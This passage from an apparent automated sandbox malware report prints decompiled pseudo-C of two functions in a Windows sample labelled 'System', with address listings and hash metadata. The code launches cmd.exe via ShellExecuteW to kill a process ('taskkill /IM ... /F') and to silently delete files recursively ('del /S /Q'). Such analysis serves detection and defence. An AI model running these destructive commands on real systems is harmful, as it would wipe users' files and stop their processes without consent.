				goto 0xe4c44a74;
				E00007FF67FF6E4C4B740(_t366 + 1, _t506 + 0x58, _t498 - _t366, _t498, _t504, _t501);
				_t329 = _t328;
				r8d = 1;
				E00007FF67FF6E4C4AB00(_t366 + 1, _t329, _t501, _t501);
				 *(_t504 - 0x20) = _t530;
				 *(_t504 - 0x10) = _t530;
				 *(_t504 - 8) = _t530;
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x20], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp-0x10], xmm1");
				 *(_t329 + 0x10) = _t530;
				 *((long long*)(_t329 + 0x18)) = 0xf;
				 *_t329 = 0;
				_t460 =  *((intOrPtr*)(_t506 + 0x70));
				if (_t460 - 0x10 < 0) goto 0xe4c44b44;
				if (_t460 + 1 - 0x1000 < 0) goto 0xe4c44b3f;
				if ( *((intOrPtr*)(_t506 + 0x58)) -  *((intOrPtr*)( *((intOrPtr*)(_t506 + 0x58)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44f27;
				0xe4c623d0();
				 *(_t506 + 0x68) = _t530;
				 *((long long*)(_t506 + 0x70)) = 0xf;
				 *((char*)(_t506 + 0x58)) = 0;
				_t464 =  >=  ?  *(_t504 - 0x40) : _t504 - 0x40;
				_t241 = E00007FF67FF6E4C4AB00(_t366 + 1, _t504 - 0x20, _t501,  *(_t504 - 0x30));
				r8d = 0x800;
				E00007FF67FF6E4C64A30(_t241, 0xa, _t504 + 0x930, 0,  *(_t504 - 0x30));
				_t518 =  >=  ?  *(_t504 - 0x20) : _t504 - 0x20;
				 *((long long*)(_t506 + 0x28)) = 0x400;
				_t333 = _t504 + 0x930;
				 *(_t506 + 0x20) = _t333;
				r9d =  *(_t504 - 0x10);
				E00007FF67FF6E4C4B740(_t366 + 1, _t506 + 0x38, 0, _t498, _t504, _t501);
				_t334 = _t333;
				r8d = 8;
				_t245 = E00007FF67FF6E4C4AB00(_t366 + 1, _t334, _t501, _t501);
				asm("movups xmm0, [eax]");
				asm("movups [ebp], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp+0x10], xmm1");
				 *(_t334 + 0x10) = _t530;
				 *((long long*)(_t334 + 0x18)) = 0xf;
				 *_t334 = 0;
				_t468 =  *(_t506 + 0x50);
				if (_t468 - 0x10 < 0) goto 0xe4c44c37;
				if (_t468 + 1 - 0x1000 < 0) goto 0xe4c44c32;
				if ( *(_t506 + 0x38) -  *((intOrPtr*)( *(_t506 + 0x38) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44f2d;
				0xe4c623d0();
				r8d = 0x800;
				E00007FF67FF6E4C64A30(_t245, 0xa, _t504 + 0x130, 0, _t501);
				_t521 =  >=  ?  *_t504 : _t504;
				 *((long long*)(_t506 + 0x28)) = 0x400;
				 *(_t506 + 0x20) = _t504 + 0x130;
				r9d =  *(_t504 + 0x10);
				E00007FF67FF6E4C69A50(); // executed
				_t527 =  >=  ?  *(_t504 - 0x80) : _t504 - 0x80;
				 *((intOrPtr*)(_t506 + 0x28)) = r14d;
				 *(_t506 + 0x20) = _t530;
				ShellExecuteW(??, ??, ??, ??, ??, ??); // executed
				_t475 =  *((intOrPtr*)(_t504 + 0x18));
				if (_t475 - 0x10 < 0) goto 0xe4c44d05;
				if (_t475 + 1 - 0x1000 < 0) goto 0xe4c44d00;
				if ( *_t504 -  *((intOrPtr*)( *_t504 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44f33;
				0xe4c623d0();
				 *(_t504 + 0x10) = _t530;
				 *((long long*)(_t504 + 0x18)) = 0xf;
				 *_t504 = 0;
				_t478 =  *(_t504 - 8);
				if (_t478 - 0x10 < 0) goto 0xe4c44d50;
				if (_t478 + 1 - 0x1000 < 0) goto 0xe4c44d4b;
				if ( *(_t504 - 0x20) -  *((intOrPtr*)( *(_t504 - 0x20) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44f39;
				0xe4c623d0();
				 *(_t504 - 0x10) = _t530;
				 *(_t504 - 8) = 0xf;
				 *(_t504 - 0x20) = 0;
				_t481 =  *((intOrPtr*)(_t504 - 0x68));
				if (_t481 - 8 < 0) goto 0xe4c44da0;
				if (2 + _t481 * 2 - 0x1000 < 0) goto 0xe4c44d9b;
				if ( *(_t504 - 0x80) -  *((intOrPtr*)( *(_t504 - 0x80) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44f3f;
				0xe4c623d0();
				 *(_t504 - 0x70) = _t530;
				 *((long long*)(_t504 - 0x68)) = 7;
				 *(_t504 - 0x80) = r14w;
				_t484 =  *((intOrPtr*)(_t504 - 0x48));
				if (_t484 - 0x10 < 0) goto 0xe4c44dec;
				if (_t484 + 1 - 0x1000 < 0) goto 0xe4c44de7;
				if ( *((intOrPtr*)(_t504 - 0x60)) -  *((intOrPtr*)( *((intOrPtr*)(_t504 - 0x60)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44f45;
				0xe4c623d0();
				 *(_t504 - 0x50) = _t530;
				 *((long long*)(_t504 - 0x48)) = 0xf;
				 *((char*)(_t504 - 0x60)) = 0;
				_t487 =  *((intOrPtr*)(_t504 - 0x28));
				if (_t487 - 0x10 < 0) goto 0xe4c44e38;
				if (_t487 + 1 - 0x1000 < 0) goto 0xe4c44e32;
				if ( *(_t504 - 0x40) -  *((intOrPtr*)( *(_t504 - 0x40) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44f0f;
				0xe4c623d0();
				 *((long long*)(_t504 +  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) + 0x20)) = 0xe4c89bc0;
				 *((long long*)(_t504 +  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) - 0xb0;
				E00007FF67FF6E4C49470(0xa, _t504 + 0x30);
				 *((long long*)(_t504 +  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) + 0x20)) = 0xe4c89798;
				 *((long long*)(_t504 +  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) - 0x18;
				 *((long long*)(_t504 + 0xd0)) = 0xe4c89778;
				_t252 = E00007FF67FF6E4C61494(_t504 + 0xd0);
				_t492 =  *((intOrPtr*)(_t501 + 0x18));
				if (_t492 - 0x10 < 0) goto 0xe4c44ed4;
				if (_t492 + 1 - 0x1000 < 0) goto 0xe4c44ecf;
				if ( *_t501 -  *((intOrPtr*)( *_t501 - 8)) - 8 - 0x1f > 0) goto 0xe4c44f15;
				0xe4c623d0();
				 *(_t501 + 0x10) = _t530;
				 *((long long*)(_t501 + 0x18)) = 0xf;
				 *_t501 = 0;
				return E00007FF67FF6E4C623B0(_t252, _t255,  *(_t504 + 0x1130) ^ _t506);
			}






















































                                                                                                                                                              0x7ff6e4c44750
                                                                                                                                                              0x7ff6e4c44750
                                                                                                                                                              0x7ff6e4c44750
                                                                                                                                                              0x7ff6e4c44755
                                                                                                                                                              0x7ff6e4c4475a
                                                                                                                                                              0x7ff6e4c44764
                                                                                                                                                              0x7ff6e4c44775
                                                                                                                                                              0x7ff6e4c44778
                                                                                                                                                              0x7ff6e4c44780
                                                                                                                                                              0x7ff6e4c44783
                                                                                                                                                              0x7ff6e4c4478a
                                                                                                                                                              0x7ff6e4c4478d
                                                                                                                                                              0x7ff6e4c44794
                                                                                                                                                              0x7ff6e4c4479e
                                                                                                                                                              0x7ff6e4c447a3
                                                                                                                                                              0x7ff6e4c447ab
                                                                                                                                                              0x7ff6e4c447b0
                                                                                                                                                              0x7ff6e4c447b1
                                                                                                                                                              0x7ff6e4c447c1
                                                                                                                                                              0x7ff6e4c447c6
                                                                                                                                                              0x7ff6e4c447c9
                                                                                                                                                              0x7ff6e4c447ce
                                                                                                                                                              0x7ff6e4c447d3
                                                                                                                                                              0x7ff6e4c447d8
                                                                                                                                                              0x7ff6e4c447db
                                                                                                                                                              0x7ff6e4c447e0
                                                                                                                                                              0x7ff6e4c447e4
                                                                                                                                                              0x7ff6e4c447e9
                                                                                                                                                              0x7ff6e4c447ed
                                                                                                                                                              0x7ff6e4c447f5
                                                                                                                                                              0x7ff6e4c44803
                                                                                                                                                              0x7ff6e4c4480d
                                                                                                                                                              0x7ff6e4c44821
                                                                                                                                                              0x7ff6e4c44834
                                                                                                                                                              0x7ff6e4c44838
                                                                                                                                                              0x7ff6e4c44841
                                                                                                                                                              0x7ff6e4c44855
                                                                                                                                                              0x7ff6e4c4486a
                                                                                                                                                              0x7ff6e4c44870
                                                                                                                                                              0x7ff6e4c44875
                                                                                                                                                              0x7ff6e4c4487a
                                                                                                                                                              0x7ff6e4c44883
                                                                                                                                                              0x7ff6e4c44888
                                                                                                                                                              0x7ff6e4c44891
                                                                                                                                                              0x7ff6e4c448a5
                                                                                                                                                              0x7ff6e4c448ba
                                                                                                                                                              0x7ff6e4c448c0
                                                                                                                                                              0x7ff6e4c448c5
                                                                                                                                                              0x7ff6e4c448ca
                                                                                                                                                              0x7ff6e4c448d3
                                                                                                                                                              0x7ff6e4c448d8
                                                                                                                                                              0x7ff6e4c448dd
                                                                                                                                                              0x7ff6e4c448e1
                                                                                                                                                              0x7ff6e4c448e5
                                                                                                                                                              0x7ff6e4c448ed
                                                                                                                                                              0x7ff6e4c448f1
                                                                                                                                                              0x7ff6e4c44900
                                                                                                                                                              0x7ff6e4c44913
                                                                                                                                                              0x7ff6e4c44917
                                                                                                                                                              0x7ff6e4c4491c
                                                                                                                                                              0x7ff6e4c4491f
                                                                                                                                                              0x7ff6e4c44922
                                                                                                                                                              0x7ff6e4c44928
                                                                                                                                                              0x7ff6e4c44939
                                                                                                                                                              0x7ff6e4c4493f
                                                                                                                                                              0x7ff6e4c44947
                                                                                                                                                              0x7ff6e4c4494c
                                                                                                                                                              0x7ff6e4c44952
                                                                                                                                                              0x7ff6e4c44963
                                                                                                                                                              0x7ff6e4c44965
                                                                                                                                                              0x7ff6e4c44971
                                                                                                                                                              0x7ff6e4c4497a
                                                                                                                                                              0x7ff6e4c4497f
                                                                                                                                                              0x7ff6e4c44982
                                                                                                                                                              0x7ff6e4c44984
                                                                                                                                                              0x7ff6e4c4499c
                                                                                                                                                              0x7ff6e4c4499f
                                                                                                                                                              0x7ff6e4c449a1
                                                                                                                                                              0x7ff6e4c449a3
                                                                                                                                                              0x7ff6e4c449a7
                                                                                                                                                              0x7ff6e4c449ad
                                                                                                                                                              0x7ff6e4c449af
                                                                                                                                                              0x7ff6e4c449bc
                                                                                                                                                              0x7ff6e4c449bf
                                                                                                                                                              0x7ff6e4c449d5
                                                                                                                                                              0x7ff6e4c449e4
                                                                                                                                                              0x7ff6e4c449e9
                                                                                                                                                              0x7ff6e4c449f1
                                                                                                                                                              0x7ff6e4c449f6
                                                                                                                                                              0x7ff6e4c44a07
                                                                                                                                                              0x7ff6e4c44a15
                                                                                                                                                              0x7ff6e4c44a1a
                                                                                                                                                              0x7ff6e4c44a27
                                                                                                                                                              0x7ff6e4c44a2c
                                                                                                                                                              0x7ff6e4c44a33
                                                                                                                                                              0x7ff6e4c44a37
                                                                                                                                                              0x7ff6e4c44a3d
                                                                                                                                                              0x7ff6e4c44a41
                                                                                                                                                              0x7ff6e4c44a50
                                                                                                                                                              0x7ff6e4c44a56
                                                                                                                                                              0x7ff6e4c44a5b
                                                                                                                                                              0x7ff6e4c44a5e
                                                                                                                                                              0x7ff6e4c44a6a
                                                                                                                                                              0x7ff6e4c44a72
                                                                                                                                                              0x7ff6e4c44a74
                                                                                                                                                              0x7ff6e4c44a7b
                                                                                                                                                              0x7ff6e4c44a7d
                                                                                                                                                              0x7ff6e4c44a81
                                                                                                                                                              0x7ff6e4c44a8d
                                                                                                                                                              0x7ff6e4c44a92
                                                                                                                                                              0x7ff6e4c44a97
                                                                                                                                                              0x7ff6e4c44a9d
                                                                                                                                                              0x7ff6e4c44aa3
                                                                                                                                                              0x7ff6e4c44aae
                                                                                                                                                              0x7ff6e4c44ab8
                                                                                                                                                              0x7ff6e4c44ac2
                                                                                                                                                              0x7ff6e4c44ac7
                                                                                                                                                              0x7ff6e4c44ac8
                                                                                                                                                              0x7ff6e4c44ad8
                                                                                                                                                              0x7ff6e4c44add
                                                                                                                                                              0x7ff6e4c44ae1
                                                                                                                                                              0x7ff6e4c44ae5
                                                                                                                                                              0x7ff6e4c44ae9
                                                                                                                                                              0x7ff6e4c44aec
                                                                                                                                                              0x7ff6e4c44af0
                                                                                                                                                              0x7ff6e4c44af4
                                                                                                                                                              0x7ff6e4c44af8
                                                                                                                                                              0x7ff6e4c44afc
                                                                                                                                                              0x7ff6e4c44b04
                                                                                                                                                              0x7ff6e4c44b07
                                                                                                                                                              0x7ff6e4c44b10
                                                                                                                                                              0x7ff6e4c44b24
                                                                                                                                                              0x7ff6e4c44b39
                                                                                                                                                              0x7ff6e4c44b3f
                                                                                                                                                              0x7ff6e4c44b44
                                                                                                                                                              0x7ff6e4c44b49
                                                                                                                                                              0x7ff6e4c44b52
                                                                                                                                                              0x7ff6e4c44b60
                                                                                                                                                              0x7ff6e4c44b6d
                                                                                                                                                              0x7ff6e4c44b74
                                                                                                                                                              0x7ff6e4c44b81
                                                                                                                                                              0x7ff6e4c44b8f
                                                                                                                                                              0x7ff6e4c44b94
                                                                                                                                                              0x7ff6e4c44b9c
                                                                                                                                                              0x7ff6e4c44ba3
                                                                                                                                                              0x7ff6e4c44ba8
                                                                                                                                                              0x7ff6e4c44bc1
                                                                                                                                                              0x7ff6e4c44bc6
                                                                                                                                                              0x7ff6e4c44bc7
                                                                                                                                                              0x7ff6e4c44bd7
                                                                                                                                                              0x7ff6e4c44bdc
                                                                                                                                                              0x7ff6e4c44bdf
                                                                                                                                                              0x7ff6e4c44be3
                                                                                                                                                              0x7ff6e4c44be7
                                                                                                                                                              0x7ff6e4c44beb
                                                                                                                                                              0x7ff6e4c44bef
                                                                                                                                                              0x7ff6e4c44bf7
                                                                                                                                                              0x7ff6e4c44bfa
                                                                                                                                                              0x7ff6e4c44c03
                                                                                                                                                              0x7ff6e4c44c17
                                                                                                                                                              0x7ff6e4c44c2c
                                                                                                                                                              0x7ff6e4c44c32
                                                                                                                                                              0x7ff6e4c44c39
                                                                                                                                                              0x7ff6e4c44c46
                                                                                                                                                              0x7ff6e4c44c54
                                                                                                                                                              0x7ff6e4c44c59
                                                                                                                                                              0x7ff6e4c44c68
                                                                                                                                                              0x7ff6e4c44c6d
                                                                                                                                                              0x7ff6e4c44c8c
                                                                                                                                                              0x7ff6e4c44ca5
                                                                                                                                                              0x7ff6e4c44caa
                                                                                                                                                              0x7ff6e4c44caf
                                                                                                                                                              0x7ff6e4c44cc4
                                                                                                                                                              0x7ff6e4c44cca
                                                                                                                                                              0x7ff6e4c44cd2
                                                                                                                                                              0x7ff6e4c44ce5
                                                                                                                                                              0x7ff6e4c44cfa
                                                                                                                                                              0x7ff6e4c44d00
                                                                                                                                                              0x7ff6e4c44d05
                                                                                                                                                              0x7ff6e4c44d09
                                                                                                                                                              0x7ff6e4c44d11
                                                                                                                                                              0x7ff6e4c44d15
                                                                                                                                                              0x7ff6e4c44d1d
                                                                                                                                                              0x7ff6e4c44d30
                                                                                                                                                              0x7ff6e4c44d45
                                                                                                                                                              0x7ff6e4c44d4b
                                                                                                                                                              0x7ff6e4c44d50
                                                                                                                                                              0x7ff6e4c44d54
                                                                                                                                                              0x7ff6e4c44d5c
                                                                                                                                                              0x7ff6e4c44d60
                                                                                                                                                              0x7ff6e4c44d68
                                                                                                                                                              0x7ff6e4c44d80
                                                                                                                                                              0x7ff6e4c44d95
                                                                                                                                                              0x7ff6e4c44d9b
                                                                                                                                                              0x7ff6e4c44da0
                                                                                                                                                              0x7ff6e4c44da4
                                                                                                                                                              0x7ff6e4c44dac
                                                                                                                                                              0x7ff6e4c44db1
                                                                                                                                                              0x7ff6e4c44db9
                                                                                                                                                              0x7ff6e4c44dcc
                                                                                                                                                              0x7ff6e4c44de1
                                                                                                                                                              0x7ff6e4c44de7
                                                                                                                                                              0x7ff6e4c44dec
                                                                                                                                                              0x7ff6e4c44df0
                                                                                                                                                              0x7ff6e4c44df8
                                                                                                                                                              0x7ff6e4c44dfc
                                                                                                                                                              0x7ff6e4c44e04
                                                                                                                                                              0x7ff6e4c44e17
                                                                                                                                                              0x7ff6e4c44e2c
                                                                                                                                                              0x7ff6e4c44e32
                                                                                                                                                              0x7ff6e4c44e40
                                                                                                                                                              0x7ff6e4c44e53
                                                                                                                                                              0x7ff6e4c44e5b
                                                                                                                                                              0x7ff6e4c44e6f
                                                                                                                                                              0x7ff6e4c44e7f
                                                                                                                                                              0x7ff6e4c44e8a
                                                                                                                                                              0x7ff6e4c44e98
                                                                                                                                                              0x7ff6e4c44e9e
                                                                                                                                                              0x7ff6e4c44ea6
                                                                                                                                                              0x7ff6e4c44eb5
                                                                                                                                                              0x7ff6e4c44eca
                                                                                                                                                              0x7ff6e4c44ecf
                                                                                                                                                              0x7ff6e4c44ed4
                                                                                                                                                              0x7ff6e4c44ed8
                                                                                                                                                              0x7ff6e4c44ee0
                                                                                                                                                              0x7ff6e4c44f0e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$Concurrency::cancel_current_taskExecuteShellSleep
                                                                                                                                                              • String ID: /F && exit$/K taskkill /IM $\name.txt$\old.exe$cmd.exe$open
                                                                                                                                                              • API String ID: 2008784991-3313576588
                                                                                                                                                              • Opcode ID: ca95c83e5ac20027e383ce28cad2a345ef2527cc39f7b160816d3b5a4e9cde47
                                                                                                                                                              • Instruction ID: eb88e4f3ff5c8c56b473d57f359ce91c1c4c1076908845be18d5014261da91a2
                                                                                                                                                              • Opcode Fuzzy Hash: ca95c83e5ac20027e383ce28cad2a345ef2527cc39f7b160816d3b5a4e9cde47
                                                                                                                                                              • Instruction Fuzzy Hash: 4F32CF27B14B8685EB00CF75D4843AD2772FB44B98F508236DA5D93AE9DF7AD081C309
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C44FF0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 168COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 26%
                                                                                                                                                              			E00007FF67FF6E4C44FF0(long long __rbx, long long __rcx, long long __rsi) {
				void* __rdi;
				void* __rbp;
				void* _t76;
				void* _t78;
				signed long long _t98;
				void* _t104;
				char* _t114;
				signed long long _t123;
				signed long long _t145;
				intOrPtr _t148;
				intOrPtr _t151;
				void* _t154;
				char* _t155;
				void* _t159;
				void* _t161;
				void* _t162;
				void* _t164;
				signed long long _t165;
				void* _t167;
				long long _t168;
				void* _t174;
				void* _t176;
				signed long long _t177;
				void* _t179;

				_t157 = __rsi;
				_t112 = __rbx;
				 *((long long*)(_t164 + 0x10)) = __rbx;
				 *((long long*)(_t164 + 0x18)) = __rsi;
				_t162 = _t164 - 0x47;
				_t165 = _t164 - 0x90;
				_t98 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t162 + 0x37) = _t98 ^ _t165;
				_t155 = __rcx;
				 *((long long*)(_t162 - 0x11)) = __rcx;
				r14d = 0;
				 *(_t162 + 0x17) = _t177;
				 *(_t162 + 0x27) = _t177;
				 *((long long*)(_t162 + 0x2f)) = 0xf;
				 *(_t162 + 0x17) = r14b;
				_t10 = _t177 + 0xd; // 0xd
				r8d = _t10;
				E00007FF67FF6E4C4A9A0(_t162 + 0x17, "/K del /S /Q ", _t167);
				if ( *((long long*)(_t155 + 0x18)) - 0x10 < 0) goto 0xe4c45058;
				_t168 =  *(_t155 + 0x10);
				E00007FF67FF6E4C4AB00(__rbx, _t162 + 0x17, __rsi, _t168, _t177);
				r8d = 8;
				E00007FF67FF6E4C4AB00(_t112, _t162 + 0x17, _t157, _t168, _t154);
				_t141 =  >=  ?  *(_t162 + 0x17) : _t162 + 0x17;
				_t159 =  *(_t162 + 0x27) + ( >=  ?  *(_t162 + 0x17) : _t162 + 0x17);
				_t114 =  >=  ?  *(_t162 + 0x17) : _t162 + 0x17;
				 *(_t162 - 9) = _t177;
				 *(_t162 + 7) = _t177;
				r8d = 7;
				 *((long long*)(_t162 + 0xf)) = _t168;
				if (_t159 - _t114 - 8 < 0) goto 0xe4c450d3;
				E00007FF67FF6E4C4C130(_t162 - 9, _t159 - _t114, _t155, _t162, _t179);
				_t123 = _t177;
				 *(_t162 + 7) = _t123;
				 *((long long*)(_t162 - 0x19)) = _t162 - 9;
				if (_t114 == _t159) goto 0xe4c45126;
				r9d =  *_t114;
				if (_t123 -  *((intOrPtr*)(_t162 + 0xf)) >= 0) goto 0xe4c4510b;
				_t32 = _t123 + 1; // 0x1
				 *(_t162 + 7) = _t32;
				_t104 =  >=  ?  *(_t162 - 9) : _t162 - 9;
				 *((intOrPtr*)(_t104 + _t123 * 2)) = r9w;
				 *(_t104 + 2 + _t123 * 2) = r14w;
				goto 0xe4c45114;
				E00007FF67FF6E4C4C2A0(_t162 - 9, _t155, _t162, _t176, _t179);
				if (_t114 + 1 == _t159) goto 0xe4c45126;
				goto 0xe4c450e0;
				_t174 =  >=  ?  *(_t162 - 9) : _t162 - 9;
				 *((intOrPtr*)(_t165 + 0x28)) = r14d;
				 *(_t165 + 0x20) = _t177;
				_t76 = ShellExecuteW(_t161, ??, ??, ??, ??); // executed
				_t145 =  *((intOrPtr*)(_t162 + 0xf));
				if (_t145 - 8 < 0) goto 0xe4c45193;
				if (2 + _t145 * 2 - 0x1000 < 0) goto 0xe4c4518e;
				if ( *(_t162 - 9) -  *((intOrPtr*)( *(_t162 - 9) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c45260;
				0xe4c623d0();
				 *(_t162 + 7) = _t177;
				 *((long long*)(_t162 + 0xf)) = 7;
				 *(_t162 - 9) = r14w;
				_t148 =  *((intOrPtr*)(_t162 + 0x2f));
				if (_t148 - 0x10 < 0) goto 0xe4c451db;
				if (_t148 + 1 - 0x1000 < 0) goto 0xe4c451d6;
				if ( *(_t162 + 0x17) -  *((intOrPtr*)( *(_t162 + 0x17) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c45254;
				0xe4c623d0();
				 *(_t162 + 0x27) = _t177;
				 *((long long*)(_t162 + 0x2f)) = 0xf;
				 *(_t162 + 0x17) = 0;
				_t151 =  *((intOrPtr*)(_t155 + 0x18));
				if (_t151 - 0x10 < 0) goto 0xe4c45221;
				if (_t151 + 1 - 0x1000 < 0) goto 0xe4c4521c;
				if ( *_t155 -  *((intOrPtr*)( *_t155 - 8)) - 8 - 0x1f > 0) goto 0xe4c4525a;
				0xe4c623d0();
				 *(_t155 + 0x10) = _t177;
				 *((long long*)(_t155 + 0x18)) = 0xf;
				 *_t155 = 0;
				return E00007FF67FF6E4C623B0(_t76, _t78,  *(_t162 + 0x37) ^ _t165);
			}



























                                                                                                                                                              0x7ff6e4c44ff0
                                                                                                                                                              0x7ff6e4c44ff0
                                                                                                                                                              0x7ff6e4c44ff0
                                                                                                                                                              0x7ff6e4c44ff5
                                                                                                                                                              0x7ff6e4c44ffe
                                                                                                                                                              0x7ff6e4c45003
                                                                                                                                                              0x7ff6e4c4500a
                                                                                                                                                              0x7ff6e4c45014
                                                                                                                                                              0x7ff6e4c45018
                                                                                                                                                              0x7ff6e4c4501b
                                                                                                                                                              0x7ff6e4c4501f
                                                                                                                                                              0x7ff6e4c45022
                                                                                                                                                              0x7ff6e4c45026
                                                                                                                                                              0x7ff6e4c4502a
                                                                                                                                                              0x7ff6e4c45032
                                                                                                                                                              0x7ff6e4c45036
                                                                                                                                                              0x7ff6e4c45036
                                                                                                                                                              0x7ff6e4c45045
                                                                                                                                                              0x7ff6e4c45053
                                                                                                                                                              0x7ff6e4c45058
                                                                                                                                                              0x7ff6e4c45060
                                                                                                                                                              0x7ff6e4c45065
                                                                                                                                                              0x7ff6e4c45076
                                                                                                                                                              0x7ff6e4c45084
                                                                                                                                                              0x7ff6e4c4508d
                                                                                                                                                              0x7ff6e4c45099
                                                                                                                                                              0x7ff6e4c4509e
                                                                                                                                                              0x7ff6e4c450a5
                                                                                                                                                              0x7ff6e4c450a9
                                                                                                                                                              0x7ff6e4c450af
                                                                                                                                                              0x7ff6e4c450bd
                                                                                                                                                              0x7ff6e4c450c3
                                                                                                                                                              0x7ff6e4c450c8
                                                                                                                                                              0x7ff6e4c450cb
                                                                                                                                                              0x7ff6e4c450d7
                                                                                                                                                              0x7ff6e4c450de
                                                                                                                                                              0x7ff6e4c450e0
                                                                                                                                                              0x7ff6e4c450e7
                                                                                                                                                              0x7ff6e4c450e9
                                                                                                                                                              0x7ff6e4c450ed
                                                                                                                                                              0x7ff6e4c450f9
                                                                                                                                                              0x7ff6e4c450fe
                                                                                                                                                              0x7ff6e4c45103
                                                                                                                                                              0x7ff6e4c45109
                                                                                                                                                              0x7ff6e4c4510f
                                                                                                                                                              0x7ff6e4c4511e
                                                                                                                                                              0x7ff6e4c45124
                                                                                                                                                              0x7ff6e4c4512e
                                                                                                                                                              0x7ff6e4c45133
                                                                                                                                                              0x7ff6e4c45138
                                                                                                                                                              0x7ff6e4c4514d
                                                                                                                                                              0x7ff6e4c45153
                                                                                                                                                              0x7ff6e4c4515b
                                                                                                                                                              0x7ff6e4c45173
                                                                                                                                                              0x7ff6e4c45188
                                                                                                                                                              0x7ff6e4c4518e
                                                                                                                                                              0x7ff6e4c45193
                                                                                                                                                              0x7ff6e4c45197
                                                                                                                                                              0x7ff6e4c4519f
                                                                                                                                                              0x7ff6e4c451a4
                                                                                                                                                              0x7ff6e4c451ac
                                                                                                                                                              0x7ff6e4c451bf
                                                                                                                                                              0x7ff6e4c451d4
                                                                                                                                                              0x7ff6e4c451d6
                                                                                                                                                              0x7ff6e4c451db
                                                                                                                                                              0x7ff6e4c451df
                                                                                                                                                              0x7ff6e4c451e7
                                                                                                                                                              0x7ff6e4c451eb
                                                                                                                                                              0x7ff6e4c451f3
                                                                                                                                                              0x7ff6e4c45202
                                                                                                                                                              0x7ff6e4c45217
                                                                                                                                                              0x7ff6e4c4521c
                                                                                                                                                              0x7ff6e4c45221
                                                                                                                                                              0x7ff6e4c45225
                                                                                                                                                              0x7ff6e4c4522d
                                                                                                                                                              0x7ff6e4c45253

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ExecuteShell
                                                                                                                                                              • String ID: && exit$/K del /S /Q $cmd.exe$open
                                                                                                                                                              • API String ID: 4120902618-1538420477
                                                                                                                                                              • Opcode ID: 175189950b467f366b0f9083fd1c3a47e9bf76eb8bbd65ad52258866c47fb5f9
                                                                                                                                                              • Instruction ID: 22e183ad074299826ae6842e500e89f2504f4d6387b142a22302c3cdb1262274
                                                                                                                                                              • Opcode Fuzzy Hash: 175189950b467f366b0f9083fd1c3a47e9bf76eb8bbd65ad52258866c47fb5f9
                                                                                                                                                              • Instruction Fuzzy Hash: 32718B7B754A8299EB10DF74D1943AC3371EB04B88F808532EA1C57E99DF3AD552C349
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C84030 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
